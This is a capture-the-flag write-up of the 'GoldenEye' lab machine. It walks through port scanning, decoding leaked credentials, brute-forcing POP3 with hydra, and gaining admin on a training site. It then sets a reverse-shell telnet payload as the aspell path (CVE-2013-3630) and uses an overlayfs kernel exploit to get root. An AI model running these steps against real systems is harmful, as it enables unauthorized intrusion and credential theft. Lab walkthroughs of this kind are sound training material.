# Enumeration
## NMAP
```nmap
PORT      STATE SERVICE VERSION  
25/tcp    open  smtp?  
| fingerprint-strings:    
|   Hello:    
|     220 ubuntu GoldentEye SMTP Electronic-Mail agent  
|     Syntax: EHLO hostname  
|   Help:    
|     220 ubuntu GoldentEye SMTP Electronic-Mail agent  
|     5.5.2 Error: command not recognized  
|   NULL:    
|_    220 ubuntu GoldentEye SMTP Electronic-Mail agent  
|_ssl-date: TLS randomness does not represent time  
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN  
80/tcp    open  http    Apache httpd 2.4.7 ((Ubuntu))  
|_http-title: GoldenEye Primary Admin Server  
|_http-server-header: Apache/2.4.7 (Ubuntu)  
55006/tcp open  unknown  
|_ssl-date: TLS randomness does not represent time  
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server  
| Not valid before: 2018-04-24T03:23:52  
|_Not valid after:  2028-04-23T03:23:52  
55007/tcp open  pop3    Dovecot pop3d  
|_ssl-date: TLS randomness does not represent time  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
SF-Port25-TCP:V=7.92%I=7%D=9/11%Time=613B9CEB%P=x86_64-pc-linux-gnu%r(NULL  
SF:,32,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r\  
SF:n")%r(Hello,4D,"220\x20ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\  
SF:x20agent\r\n501\x20Syntax:\x20EHLO\x20hostname\r\n")%r(Help,5B,"220\x20  
SF:ubuntu\x20GoldentEye\x20SMTP\x20Electronic-Mail\x20agent\r\n502\x205\.5  
SF:\.2\x20Error:\x20command\x20not\x20recognized\r\n");
```
## Web
- No robots.txt
- Page says navigate to `/sev-home/ to login`.
- It asks for a user and password, we don't have credentials. Check source code.
- Found interesting comments in `terminal.js`.
```js
//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
```
- Password is encoded in HTML entities.
- Possible Credentials
`boris:InvincibleHack3r`
- What the page says when logged in.
```txt
Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
```
## POP3
- We can try to login using the credentials using telnet
```bash
-ERR [AUTH] Authentication failed.
```
- Since they're saying they're trusting obscurity more, maybe they have a weak password, we can try brute-forcing with hydra.
- We have a list of users.
```txt
boris
natalya
```
```bash
$hydra -L users.txt -P /usr/share/wordlists/fasttrack.txt -f 10.10.170.186 pop3 -s 55007 -V
```
- Found valid credentials
```bash
[55007][pop3] host: 10.10.170.186   login: boris   password: secret1!
```
### Boris's messages
- We have 3 messages
```txt
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
```
```txt
Boris, I can break your codes!
```
```txt
Boris,  
  
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of thes  
e acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!  
  
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....  
  
PS - Keep security tight or we will be compromised.
```
- We need to update our user lists.
```txt
boris
natalya
xenia
```
- Not much we can do, the room says to keep brute-forcing user passwords so lets keep doing that.
- Found another credential
```bash
[55007][pop3] host: 10.10.170.186   login: natalya   password: bird
```
### Natalya's messages
```txt
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.  
  
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
```

```txt
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll  
get the change order escalated without much hassle :)  
  
Ok, user creds are:  
  
username: xenia  
password: RCP90rulez!  
  
Boris verified her as a valid contractor so just create the account ok?  
  
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir  
**Make sure to edit your host file since you usually work remote off-network....  
  
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

```
We found valid credentials for xenia
```txt
xenia:RCP90rulez!
```
- It also says something about `severnaya-station.com`, a hidden domain? Add to /etc/hosts to access.
- Found another user through domain `severnaya-station.com` **SEE DOMAIN PART**
```bash
[55007][pop3] host: 10.10.170.186   login: doak   password: goa
```
### Doak's messages
- We have 1 message.
```txt
James,  
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?  
  
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......  
  
username: dr_doak  
password: 4England!
```
- Possible credentials
`dr_doak:4England!`


## Domain severnaya-station.com
- We found this domain through pop3 emails.
- Navigate to `http://severnaya-station.com/gnocertdir/`
- We can login using xenia's credentials.
- There is an interesting message in xenia's inbox
```txt
#### 

09:24 PM: Greetings Xenia,  
  
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.  
  
My email username is...  
  
doak  
  
Thank you,  
  
Cheers,  
  
Dr. Doak "The Doctor"  
Training Scientist - Sr Level Training Operating Supervisor  
GoldenEye Operations Center Sector  
Level 14 - NO2 - id:998623-1334  
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007  
Phone 555-193-826  
Cell 555-836-0944  
Office 555-846-9811  
Personal 555-826-9923  
Email: doak@  
Please Recycle before you print, Stay Green aka save the company money!  
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy  
"You miss 100% of the shots you don't shoot at" - Wayne G.  
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
```
- We can add this to our users list
```txt
boris
natalya
xenia
doak
```
- Let's brute force pop3 with user doak this time.
- We found credentials from pop3 for dr_doak
- We can login with those.
- Found interesting file in Private Files. `s3cret.txt`
```txt
007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
```
- We can navigate to `http://severnaya-station.com/dir007key/for-007.jpg` for the file.
- It contains interesting stuff when we view it with `exiftool`
```txt
Image Description               : eFdpbnRlcjE5OTV4IQ==
```
- If we base64 encode it we get :
`xWinter1995x!`
- Possible credentials
`admin:xWinter1995x!`
- We can login using those credentials as admin.

# Exploit
- I tried a few exploits such as this (exploit)[https://www.exploit-db.com/exploits/46551]
- But it didn't return anything.
- Room says to check about Aspell plugin.
- The CVE for this is `CVE-2013-3630`
- Change the aspell path and set Spellengine to `PSpellShell`
```txt
Path to aspell: sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'
```
- Looks like we can change the path and run commands? Let's try a reverse shell. It says to use python so we'll use python.
- So I can guess to trigger it we need to make a blog and turn it on?
```bash
listening on [any] 9001 ...  
connect to [10.17.1.163] from (UNKNOWN) [10.10.120.183] 35347  
bash: cannot set terminal process group (1069): Inappropriate ioctl for device  
bash: no job control in this shell
```

# Privilege Escalation
- Check `sudo -l` as user www-data
- Needs password.
- Kernel version is `ubuntu 3.13.0-32-generic`.
- We can check for kernel exploits (here)[https://github.com/lucyoa/kernel-exploits]
- Our kernel is vulnerable to Overlayfs.
- We don't have GCC on the system if we try to compile it.
- Use linpeas to find what tools we have.
```bash
ii  clang                               1:3.4-0ubuntu1                amd64        C, C++ and Objective-C compiler (LLVM based)
```
We do have clang.
- If we check the exploit, there is some instances of gcc that we need to change to cc for it work.
```c
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
```
- And if we fix that to cc and we compile it, we should get root!